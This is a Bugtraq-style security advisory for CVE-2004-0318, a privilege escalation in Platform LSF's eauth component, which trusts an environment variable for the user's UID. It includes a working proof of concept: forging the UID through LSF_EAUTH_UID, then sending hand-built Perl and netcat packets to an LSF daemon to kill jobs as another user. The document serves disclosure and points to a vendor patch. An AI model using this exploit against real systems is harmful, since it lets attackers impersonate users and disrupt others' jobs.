Platform Load Sharing Facility EAuth Privilege Escalation Vulnerability

Bugtraq ID:	9724
Class:	Design Error
CVE:	CVE-2004-0318
Remote:	Yes
Local:	No
Published:	Feb 23 2004 12:00AM
Updated:	Jul 12 2009 03:06AM
Credit:	Discovery of this vulnerability has been credited to Tomasz Grabowski <[email protected]>.
Vulnerable:	Platform LSF 6.0 Platform LSF 5.1 Platform LSF 5.0 Platform LSF 4.2 - HP HP-UX 11.20 - IBM AIX 4.3.3 - Microsoft Windows 2000 Professional SP3 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - SGI IRIX 6.5.14 - SGI IRIX 6.5.13 - SGI IRIX 6.5.12 - SGI IRIX 6.5.11 - SGI IRIX 6.5.10 - Sun Solaris 8_sparc - Sun Solaris 7.0 Platform LSF 4.0 - HP HP-UX 11.20 - IBM AIX 4.3.3 - Microsoft Windows 2000 Professional SP3 - Microsoft Windows 2000 Professional SP2 - Microsoft Windows 2000 Professional SP1 - Microsoft Windows 2000 Professional - Microsoft Windows NT 4.0 SP6a - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - SGI IRIX 6.5.14 - SGI IRIX 6.5.13 - SGI IRIX 6.5.12 - SGI IRIX 6.5.11 - SGI IRIX 6.5.10 - Sun Solaris 8_sparc - Sun Solaris 7.0
Not Vulnerable:

Platform Load Sharing Facility EAuth Privilege Escalation Vulnerability

Load Sharing Facility eauth component has been reported prone to privilege escalation vulnerability. The eauth component is responsible for controlling authentication procedures within Load Sharing Facility. An issue has been reported where an attacker may send commands to Load Sharing Facility as any user. The issue presents itself because eauth uses an environment variable to determine the UID of the user invoking the binary.

Platform Load Sharing Facility EAuth Privilege Escalation Vulnerability

The following example has been supplied:

$cat /etc/passwd|grep cadence
cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
$ export LSF_EAUTH_UID=500
$ eauth -c hostname
,',0/%+-$%$&&,/)

Now, she needs to send packets. She can do it, for the sake of simplicity,
using Perl and NetCat software:

(
# first packet
perl -e 'print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
print "\x00\x00\x00\x00";
'
sleep 1;

#let's call it a header, packet length
perl -e 'print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
#below we provide UID, GID and length of user name
print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
#below is the user name, end indicator, and probably auth data field length
print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
#again authentication length and auth data itself
print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
#rest of auth data, end indicator, question code (x09 - bkill) and process number
print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
print "\x00\x00\x00\x00";
'
#send it to the target daemon
) | nc 192.168.10.106 6881

Platform Load Sharing Facility EAuth Privilege Escalation Vulnerability

Solution:
The vendor has provided a fix to address this issue. Although unconfirmed, it has been reported that customers may download an appropriate patch as follows:

FTP Server: ftp.platform.com
Path: patches/<version>/os/<os>/eauth*
Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z

Platform Load Sharing Facility EAuth Privilege Escalation Vulnerability

References:

• Platform Homepage (Platform)
  
• Lam3rZ Security Advisory #2/2004: LSF eauth vulnerability leads to a possibility (Tomasz Grabowski )